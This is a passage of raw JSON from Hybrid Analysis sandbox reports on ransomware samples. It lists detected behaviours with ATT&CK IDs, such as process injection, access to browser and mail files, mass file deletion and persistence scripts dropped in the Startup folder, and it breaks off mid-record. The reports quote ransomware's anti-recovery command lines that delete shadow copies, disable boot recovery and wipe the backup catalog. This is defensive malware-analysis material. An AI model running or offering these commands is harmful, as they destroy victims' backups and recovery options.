\"\\Device\\KsecDD\"", "origin": "API Call"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "string-64", "type": 2, "relevance": 10, "name": "Input file contains API references not part of its Import Address Table (IAT)", "description": "Found string \"AddClipboardFormatListener\" (Source: ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a, API is part of module: USER32.DLL)\n Found string \"SetParent\" (Source: ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a, API is part of module: USER32.DLL)\n Found string \"Sleep\" (Source: ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a, API is part of module: KERNELBASE.DLL)\n Found string \"GetCurrentProcess\" (Source: ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a, API is part of module: KERNELBASE.DLL)", "origin": "File/Memory", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Unusual Characteristics", "identifier": "api-201", "type": 6, "relevance": 5, "name": "Write many files with double extensions (often indicator of ransomware infection)", "description": "\"svchost.exe\" write more than 100 files with extension \".txt.z8mi\"", "origin": "API Call", "attck_id": "T1486", "attck_id_wiki": "https://attack.mitre.org/techniques/T1486"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Installation/Persistence", "identifier": "api-43", "type": 6, "relevance": 10, "name": "Writes a PE file header to disc", "description": "\"svchost.exe\" wrote 27648 bytes starting with PE header signature to file \"C:\\Users\\HAPUBWS\\AppData\\Roaming\\read_it.txt\": 4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000 ...", "origin": "API Call", "attck_id": "T1105", "attck_id_wiki": "https://attack.mitre.org/techniques/T1105"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Anti-Reverse Engineering", "identifier": "api-1", "type": 6, "relevance": 10, "name": "Creates guarded memory regions (anti-debugging trick to avoid memory dumping)", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 5860)\n \"svchost.exe\" is allocating memory with PAGE_GUARD access rights (Handle: 4294967295); (PID: 4160)", "origin": "API Call", "attck_id": "T1562.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1562/001"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Environment Awareness", "identifier": "api-24", "type": 6, "relevance": 10, "name": "Tries to sleep for a long time (more than two minutes)", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" sleeping for \"1566804069\" milliseconds", "origin": "API Call", "attck_id": "T1497.003", "attck_id_wiki": "https://attack.mitre.org/techniques/T1497/003"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Spyware/Information Retrieval", "identifier": "handle-0", "type": 5, "relevance": 7, "name": "Accesses potentially sensitive information from local browsers", "description": "\"svchost.exe\" had access to \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\Manifest Resources\\mpnpojknpmmopombnjdcgaaiekajbnjb\\Icons\\read_it.txt\" (Type: \"FileHandle\")\n \"svchost.exe\" had access to \"C:\\Users\\%OSUSER%\\AppData\\Local\\Microsoft\\Windows\\History\\History.IE5\\MSHist012024030820240309\\read_it.txt\" (Type: \"FileHandle\")", "origin": "Touched Handle", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Ransomware/Banking", "identifier": "string-12", "type": 2, "relevance": 10, "name": "Detected text artifact in screenshot that indicate file could be ransomware", "description": "\"DECRYPTE\" (Source: screen_2.png, Indicator: \"decrypt\")", "origin": "File/Memory"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "Network Related", "identifier": "target-413", "type": 9, "relevance": 3, "name": "Spawned processes likely due to injection", "description": "Process \"%APPDATA%\\svchost.exe\" spawned likely due to injection", "origin": "Monitored Target", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Security", "identifier": "api-28", "type": 6, "relevance": 3, "name": "Adjusts debug privileges", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" adjusted SE_DEBUG_PRIVILEGE on file \"C:\\Windows\\System32\\shell32.dll\"\n \"svchost.exe\" adjusted SE_DEBUG_PRIVILEGE on file \"C:\\Windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d\\comctl32.dll\"", "origin": "API Call", "attck_id": "T1134", "attck_id_wiki": "https://attack.mitre.org/techniques/T1134"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-25", "type": 6, "relevance": 7, "name": "Opens file with deletion access rights", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" opened \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\read_it.txt\" with delete access", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 1, "threat_level_human": "suspicious", "category": "System Destruction", "identifier": "api-26", "type": 6, "relevance": 10, "name": "Marks file for deletion", "description": "\"svchost.exe\" marked \"C:\\TorService\\tor\\pluggable_transports\\bridges_list.meek-azure.txt\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\Downloads\\dbpilNNNF.doc\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\Downloads\\DcNNjRAkEraNbP.doc\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\Downloads\\dDvsZ3uNFlqAeM.mp3\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\Downloads\\DE8TX62RKQ.jpg\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\Downloads\\Deup.pdf\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Publisher Building Blocks\\ContentStore.xml\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01793058[[fn=Median]].dotx\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01793060[[fn=Origin]].dotx\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01793064[[fn=Equity]].dotx\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\Downloads\\DKAk0VT7CJFG5Td6.txt\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Templates\\LiveContent\\Managed\\Word Document Building Blocks\\1033\\TM01840907[[fn=Equations]].dotx\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\UProof\\CUSTOM.DIC\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\Downloads\\DP001GCJ.doc\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\013SKKWU.txt\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\Downloads\\dPk5fRu5dJDYe.avi\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\01RLWRK4.txt\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\02251G37.txt\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\04C1GH32.txt\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\Downloads\\dSTEZHvd.doc\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\04ZFG79Q.txt\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\05DR3CFO.txt\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Windows\\Cookies\\06NUD4Y2.txt\" for deletion\n \"svchost.exe\" marked \"C:\\Users\\%OSUSER%\\Downloads\\dsYny5bq4UJV.doc\" for deletion", "origin": "API Call", "attck_id": "T1070.004", "attck_id_wiki": "https://attack.mitre.org/techniques/T1070/004"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "General", "identifier": "target-58", "type": 9, "relevance": 10, "name": "The analysis spawned a process that was identified as malicious", "description": "15/22 Antivirus vendors marked spawned process \"svchost.exe\" (PID: 4160) as malicious (classified as \"Generic.Ransom.Small\" with 68% detection rate)", "origin": "Monitored Target", "attck_id": "T1204.002", "attck_id_wiki": "https://attack.mitre.org/techniques/T1204/002"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Unusual Characteristics", "identifier": "target-14", "type": 9, "relevance": 8, "name": "Spawns a lot of processes", "description": "Spawned process \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" (UID: 00000000-00005860)\n Spawned process \"svchost.exe\" (UID: 00000000-00004160)\n Spawned process \"cmd.exe\" with commandline \"/C vssadmin delete shadows /all /quiet & wmic shadowcopy delete\" (UID: 00000000-00005988)\n Spawned process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00003904)\n Spawned process \"WMIC.exe\" with commandline \"wmic shadowcopy delete\" (UID: 00000000-00003644)\n Spawned process \"cmd.exe\" with commandline \"/C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no\" (UID: 00000000-00004152)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} bootstatuspolicy ignoreallfailures\" (UID: 00000000-00004452)\n Spawned process \"bcdedit.exe\" with commandline \"bcdedit /set {default} recoveryenabled no\" (UID: 00000000-00003324)\n Spawned process \"cmd.exe\" with commandline \"/C wbadmin delete catalog -quiet\" (UID: 00000000-00001204)\n Spawned process \"wbadmin.exe\" with commandline \"wbadmin delete catalog -quiet\" (UID: 00000000-00003540)", "origin": "Monitored Target", "attck_id": "T1057", "attck_id_wiki": "https://attack.mitre.org/techniques/T1057"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-0", "type": 6, "relevance": 6, "name": "Writes data to a remote process", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" wrote 32 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe\" (Handle: 1144)\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" wrote 52 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe\" (Handle: 1144)\n \"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" wrote 4 bytes to a remote process \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\svchost.exe\" (Handle: 1144)\n \"svchost.exe\" wrote 32 bytes to a remote process \"C:\\Windows\\System32\\notepad.exe\" (Handle: 2616)\n \"svchost.exe\" wrote 52 bytes to a remote process \"C:\\Windows\\System32\\notepad.exe\" (Handle: 2616)\n \"svchost.exe\" wrote 4 bytes to a remote process \"C:\\Windows\\System32\\notepad.exe\" (Handle: 2616)", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Installation/Persistence", "identifier": "api-20", "type": 6, "relevance": 7, "name": "Allocates virtual memory in a remote process", "description": "\"ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\" allocated memory in \"C:\\ccf5526630d3e73ac6d41b6c57f01a07013100b7f2bcb9b96c7a9c275a9c9c0a.exe\"", "origin": "API Call", "attck_id": "T1055", "attck_id_wiki": "https://attack.mitre.org/techniques/T1055"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-33", "type": 9, "relevance": 10, "name": "Creates a fake system process", "description": "Process \"svchost.exe\" at non-system pathway \"%APPDATA%\\svchost.exe\" (UID: 00000000-00004160)", "origin": "Monitored Target", "attck_id": "T1036.005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1036/005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Anti-Detection/Stealthyness", "identifier": "target-6", "type": 9, "relevance": 8, "name": "Tries to suppress failures during boot (often used to hide system changes)", "description": "Tries to suppress failures during boot \"bcdedit.exe\" with commandline \"bcdedit /set {default} bootstatuspolicy ignoreallfailures\" (UID: 00000000-00004452)", "origin": "Monitored Target", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "api-96", "type": 6, "relevance": 10, "name": "Tries to steal browser sensitive information (file access)", "description": "\"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\chrome_shutdown_ms.txt\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\settings.dat\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Crashpad\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Google Profile.ico\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\heavy_ad_intervention_opt_out.db\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Scripts\\000003.log\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension Scripts\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\000010.log\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extension State\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\GCM Store\\Encryption\\000003.log\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\GCM Store\\Encryption\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\000009.log\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Local Storage\\leveldb\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\000012.log\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Session Storage\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\shared_proto_db\\000011.log\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\shared_proto_db\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\shared_proto_db\\metadata\\000012.log\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\shared_proto_db\\metadata\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Site Characteristics Database\\000010.log\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Site Characteristics Database\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Data\\LevelDB\\000011.log\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Sync Data\\LevelDB\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\Manifest Resources\\aghbiahbpaijignceidepookljebhfak\\Icons\\128.png\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\Manifest Resources\\aghbiahbpaijignceidepookljebhfak\\Icons\\READ_IT.TXT\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\Manifest Resources\\aghbiahbpaijignceidepookljebhfak\\Icons\\192.png\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\Manifest Resources\\aghbiahbpaijignceidepookljebhfak\\Icons\\256.png\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\Manifest Resources\\aghbiahbpaijignceidepookljebhfak\\Icons\\32.png\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\Manifest Resources\\aghbiahbpaijignceidepookljebhfak\\Icons\\48.png\"\n \"svchost.exe\" trying to open a file \"C:\\Users\\%OSUSER%\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Web Applications\\Manifest Resources\\aghbiahbpaijignceidepookljebhfak\\Icons\\64.png\"", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "Spyware/Information Retrieval", "identifier": "api-52", "type": 6, "relevance": 5, "name": "Reads mail related files", "description": "\"svchost.exe\" read 81920 bytes from file \"C:\\Users\\%OSUSER%\\AppData\\Roaming\\Microsoft\\Outlook\\Outlook.xml\"", "origin": "API Call", "attck_id": "T1114.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1114/001"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "target-80", "type": 9, "relevance": 10, "name": "Deletes backup catalog", "description": "Deletes backup catalog files using \"wbadmin.exe\" with commandline \"wbadmin delete catalog -quiet\" (UID: 00000000-00003540)", "origin": "Monitored Target", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "System Destruction", "identifier": "target-4", "type": 9, "relevance": 10, "name": "Deletes volume snapshots (often used by ransomware)", "description": "Process \"vssadmin.exe\" with commandline \"vssadmin delete shadows /all /quiet\" (UID: 00000000-00003904)\n Process \"WMIC.exe\" with commandline \"wmic shadowcopy delete\" (UID: 00000000-00003644)", "origin": "Monitored Target", "attck_id": "T1490", "attck_id_wiki": "https://attack.mitre.org/techniques/T1490"}, {"threat_level": 2, "threat_level_human": "malicious", "category": "External Systems", "identifier": "avtest-8", "type": 12, "relevance": 10, "name": "Sample detected by CrowdStrike Static Analysis and ML with relatively high confidence", "description": "CrowdStrike Static Analysis and ML (QuickScan) yielded detection: win/malicious_confidence_100% (W)", "origin": "External System"}]}
946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3
https://hybrid-analysis.com/sample/946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3
Hybrid Analysis - Ransomware
{"size": 4713984, "type": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "submit_name": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3", "sha256": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3", "av_detect": 91, "vx_family": "Trojan.Generic", "threat_score": 100, "threat_level": 2, "verdict": "malicious", "certificates_validation_message": "No signature was present in the subject. (0x800b0100)", "total_network_connections": 4, "total_processes": 7, "total_signatures": 213, "extracted_files": [{"name": "xlsrvintl.dll", "file_path": "%COMMONPROGRAMFILES%\\microsoft shared\\OFFICE14\\1033\\xlsrvintl.dll", "file_size": 4713984, "sha256": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3", "type_tags": ["peexe", "assembly", "executable"], "description": "PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows", "runtime_process": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe (PID: 5752)", "threat_level": 2, "threat_level_readable": "malicious", "av_label": "Trojan.Filecoder", "av_matched": 17, "av_total": 22, "file_available_to_download": true}, {"name": "Antivirus3.vbs", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\Antivirus3.vbs", "file_size": 10312, "sha256": "556700ac50ffa845e5de853498242ee5abb288eb5b8ae1ae12bfdb5746e3b7b1", "type_tags": ["text"], "description": "C source, ASCII text", "runtime_process": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe (PID: 5752)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "KasperskyScanner.hta", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\KasperskyScanner.hta", "file_size": 6995, "sha256": "1a8083787b336b322510f93d930f52aedeb90d2052501e864bfa5b1906e74d58", "type_tags": ["html"], "description": "HTML document, ASCII text, with CRLF line terminators", "runtime_process": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe (PID: 5752)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "YourMom.vbs", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMom.vbs", "file_size": 13584, "sha256": "0d2f271fe7d7a6c9252ebf6e99146991d9ad5bfbb3431d380c00419889d392d6", "type_tags": ["text"], "description": "ASCII text", "runtime_process": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe (PID: 5752)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "YourMomIsGay.html", "file_path": "%APPDATA%\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\YourMomIsGay.html", "file_size": 5107, "sha256": "390e460334ec801fdeadb511d7404ff2c8b7a0a945a0c763d0b3354e15639dbf", "type_tags": ["html"], "description": "HTML document, ISO-8859 text, with CRLF line terminators", "runtime_process": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe (PID: 5752)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "services", "file_path": "%WINDIR%\\System32\\drivers\\etc\\services", "file_size": 79, "sha256": "8fd9c10a4641311464f5a6529b4d2b23c5727d44cf735b05336d63fb905c9173", "type_tags": ["text"], "description": "ASCII text, with no line terminators", "runtime_process": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe (PID: 5752)", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "Antivirus.bat.bin", "file_size": 169746, "sha256": "baa3bfb404c663a5a813475773b4b4d479ceb8f1cf02dec627591284b959a343", "type_tags": ["script", "bat"], "description": "DOS batch file, ASCII text, with very long lines (844), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "chrmstp.exe", "file_size": 3419, "sha256": "dc98a3995c8c9db2897b3dcd603d0a55e9d6b42cb3900f9b5666dbb461172197", "type_tags": ["text"], "description": "ISO-8859 text, with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "dism.log", "file_size": 276051, "sha256": "a675b0ce10cffb7c40857c7e779cc902e93df56cbf2ac796176d751b11bc82c6", "type_tags": ["text"], "description": "Unicode text, UTF-8 (with BOM) text, with very long lines (312), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "DISMHOST.EXE.67AB3F4E.bin", "file_size": 82944, "sha256": "ecb636b278261eade712e68ec7d805d20e802628248da872d3d0ada1432ffc11", "type_tags": ["peexe", "executable"], "description": "PE32 executable (GUI) Intel 80386, for MS Windows", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "13312.txt", "file_size": 484, "sha256": "1b0c527f89a5950c40880a04d8bc52ae7fe5e95f03ee90653824a9cf30d00052", "type_tags": ["text"], "description": "ASCII text, with very long lines (482), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "16834.txt", "file_size": 481, "sha256": "bc1d52a9d9446db40b90e4774bfd26e3fb7cfad2c6c3c5aef572add133464a2b", "type_tags": ["text"], "description": "ASCII text, with very long lines (479), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "20119.txt", "file_size": 481, "sha256": "079620fa9e3e3893c761a3b754dbc1e8def805690778d1c965b2e0ce0c40cb21", "type_tags": ["text"], "description": "ASCII text, with very long lines (479), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "2160.txt", "file_size": 480, "sha256": "4fe001855338196ac1aef082ed700055239e53daa2fcad19767d2fb55c182468", "type_tags": ["text"], "description": "ASCII text, with very long lines (478), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "23110.txt", "file_size": 480, "sha256": "c4928264adedd62264f70a6ea3604115d0cb38c6e60d4f1a78e8668931577288", "type_tags": ["text"], "description": "ASCII text, with very long lines (478), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "29671.txt", "file_size": 480, "sha256": "3536707527f80b25b9d30ab1beabb82ec7b3cf680219b3c990891082ea523512", "type_tags": ["text"], "description": "ASCII text, with very long lines (478), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "25939.txt", "file_size": 478, "sha256": "e5a7fc343dec7c258085eb094a434d8b485506f065d18f7325780b4c695f1477", "type_tags": ["text"], "description": "ASCII text, with very long lines (476), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "21345.txt", "file_size": 478, "sha256": "606c3d08fa13207cff18f500bc731d174d2187480b66fbfd44b578a4e7ac97f4", "type_tags": ["text"], "description": "ASCII text, with very long lines (476), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "15186.txt", "file_size": 478, "sha256": "fda381d1735433612b07e75517363127abe60e24c13f1164826cb2a5ef9615ed", "type_tags": ["text"], "description": "ASCII text, with very long lines (476), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}, {"name": "15198.txt", "file_size": 477, "sha256": "2ca481bffc8e68c3e19a9606152e7ebb42d4e4257f9130256efa2778a35e85fc", "type_tags": ["text"], "description": "ASCII text, with very long lines (475), with CRLF line terminators", "threat_level_readable": "no specific threat", "file_available_to_download": true}], "file_metadata": {"file_compositions": [], "imported_objects": [], "file_analysis": [], "total_file_compositions_imports": null}, "processes": [{"uid": "00000000-00005752", "name": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe", "normalized_path": "C:\\946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3.exe", "sha256": "946fc3383088e6d595817379b8f710c477741421bfc1f127a511f595b4a79ca3", "av_label": "Trojan.Filecoder", "av_matched": 17, "av_total": 22}, {"uid": "00000000-00003404", "name": "WerFault.exe", "normalized_path": "%WINDIR%\\system32\\WerFault.exe", "command_line": "-u -p 3776 -s 108", "sha256": "08bace187a0225e10677de9aa6738a7118be3e5cad6dc45fb8d3366a61bb343c"}, {"uid": "00000000-00003548", "name": "WerFault.exe", "normalized_path": 